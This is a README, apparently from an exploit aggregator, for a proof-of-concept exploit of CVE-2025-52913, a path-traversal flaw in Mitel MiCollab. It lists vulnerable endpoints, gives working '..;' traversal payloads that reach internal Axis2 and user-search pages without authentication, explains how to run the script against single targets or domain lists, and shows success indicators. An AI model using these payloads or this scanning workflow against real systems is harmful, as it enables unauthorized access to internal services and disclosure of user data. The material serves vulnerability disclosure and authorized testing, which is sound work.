Share
## https://sploitus.com/exploit?id=AC285A43-7636-53D5-ABFB-C9CD48B984C5
# CVE-2025-52913 - MiCollab Path Normalization Vulnerability

## ๐Ÿ“Œ Overview

This repository contains a Proof of Concept (PoC) for **CVE-2025-52913**, a path normalization vulnerability affecting Mitel MiCollab.

The issue allows unauthenticated attackers to bypass intended path restrictions by leveraging crafted URL sequences such as `..;`, leading to access to internal application endpoints.

---

## โš ๏ธ Impact

Successful exploitation may allow:

* Access to internal and restricted endpoints
* Exposure of sensitive application components
* Potential information disclosure

---

## ๐ŸŽฏ Affected Endpoints

The vulnerability can be triggered via the following paths:

```
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
```

---

## ๐Ÿ’ฃ Payloads

Example traversal payloads:

```
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
```

---

## ๐Ÿš€ Usage

### 1. Install dependencies

```
pip install -r requirements.txt
```

### 2. Run against a single target

```
python3 POC-CVE-2025-52913.py example.com
```

### 3. Run against multiple targets

```
python3 POC-CVE-2025-52913.py domains.txt
```

---

## ๐Ÿงช Example

```
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
    [!] Possible success
```

---

## ๐Ÿ” Detection

A target is likely vulnerable if:

* The server responds with HTTP 200
* The response contains:

  * `Axis2`
  * `Axis2 Happiness Page`
  * Valid application output from internal endpoints

---

## ๐Ÿ› ๏ธ Technical Details

The vulnerability arises from improper normalization of crafted paths containing `..;`, allowing traversal beyond the intended application context.

This behavior can expose internal services such as:

* Axis2 web services interface
* Internal user management endpoints

---

## ๐Ÿ‘ค Discovery

Discovered by **Dahmani Toumi**

---

## ๐Ÿ“š References

* CVE: CVE-2025-52913
* (Add vendor advisory or NVD link when available)

---

## โš–๏ธ Disclaimer

This project is intended for **educational purposes and authorized security testing only**.

Do not use this tool against systems without explicit permission.
The author is not responsible for any misuse or damage.

---